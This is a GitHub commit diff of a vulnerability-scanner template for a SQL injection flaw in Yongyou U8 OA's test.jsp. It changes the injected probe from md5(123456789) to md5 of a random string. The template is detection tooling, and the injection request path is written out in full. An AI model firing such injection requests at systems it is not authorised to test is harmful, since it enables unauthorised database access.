Update yongyou-u8-oa-sqli.yaml

patch-1
Prince Chaddha 2022-04-10 00:40:02 +05:30 committed by GitHub
parent e33e5186d7
commit 3a870ceb11
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 4 additions and 4 deletions

View File

@ -4,20 +4,20 @@ info:
name: Yongyou U8 OA Sqli
author: ritikchaddha
severity: high
reference: http://wiki.peiqi.tech/PeiQi_Wiki/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20U8%20OA%20test.jsp%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html
reference: http://wiki.peiqi.tech/PeiQi_Wiki/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20U8%20OA%20test.jsp%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html
tags: yongyou,u8,oa,sqli
requests:
- method: GET
path:
- "{{BaseURL}}/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20md5(123456789))"
- "{{BaseURL}}/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20md5({{randstr}}))"
matchers-condition: and
matchers:
- type: word
words:
- "25f9e794323b453885f5181f1b624d0b"
part: body
words:
- '{{md5("{{randstr}}")}}'
- type: status
status: